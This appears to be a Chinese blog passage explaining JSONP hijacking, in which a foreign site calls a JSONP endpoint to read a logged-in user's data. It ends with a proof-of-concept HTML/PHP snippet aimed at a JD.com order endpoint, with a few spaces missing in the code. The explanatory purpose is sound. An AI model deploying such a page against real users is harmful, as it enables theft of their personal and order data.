对于Jsonp漏洞,这里我就不细说了,详细可以看:Jsonp常见安全漏洞分析(京东商城Jsonp 漏洞分析),从上面文章,我们知道jsonp是可以跨域名调用的。这个漏洞是:没有授权网站,可以直接在该站点访问jsonp接口资源。可能有朋友会问题:“这个漏洞有什么影响呢?”,一般我们常见有:
1.对于存在漏洞的网站来说:jsonp资源给外部调用,浪费接口资源,也给调用带来压力
2.利用者,可以通过jsonp获取网站资源,构造钓鱼站点,或者给用户发送钓鱼站点。获取用户在漏洞网站上面的用户信息(用户登陆情况下),或者偷偷操作用户功能!
具体我们看看实例:
我们看看,如果有个另外域名站点,怎么样调用该信息!
<?PHP header("Content-Type:text/html;charset=utf-8");?><script> functionjsonp13724(d) { console.log(d); } </script> <scripttype="text/javascript"src="http://my.jd.com/order/rec.action?jsoncallback=jsonp13724"> </script>